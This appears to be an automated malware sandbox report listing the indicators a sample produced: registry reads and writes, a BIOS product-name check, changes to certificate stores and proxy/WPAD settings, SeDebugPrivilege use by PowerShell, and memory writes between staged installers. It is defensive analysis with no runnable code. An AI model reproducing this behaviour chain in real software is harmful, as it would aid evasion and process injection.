Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\forfiles.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDetectedUrl C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\wscript.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionTime = a02ecf142e33db01 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\SysWOW64\wscript.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecision = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadDecisionReason = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000004000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f012f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\WpadNetworkName = "Network 3" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\f6-cc-c8-c8-ae-98\WpadDecisionReason = "1" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9776E456-0AA1-46DF-8358-8ADB5E2B134C}\f6-cc-c8-c8-ae-98 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\wscript.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A
N/A N/A C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\EMVGmrK.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2748 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
PID 2964 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\7zS7C32.tmp\Install.exe C:\Users\Admin\AppData\Local\Temp\7zS7E44.tmp\Install.exe
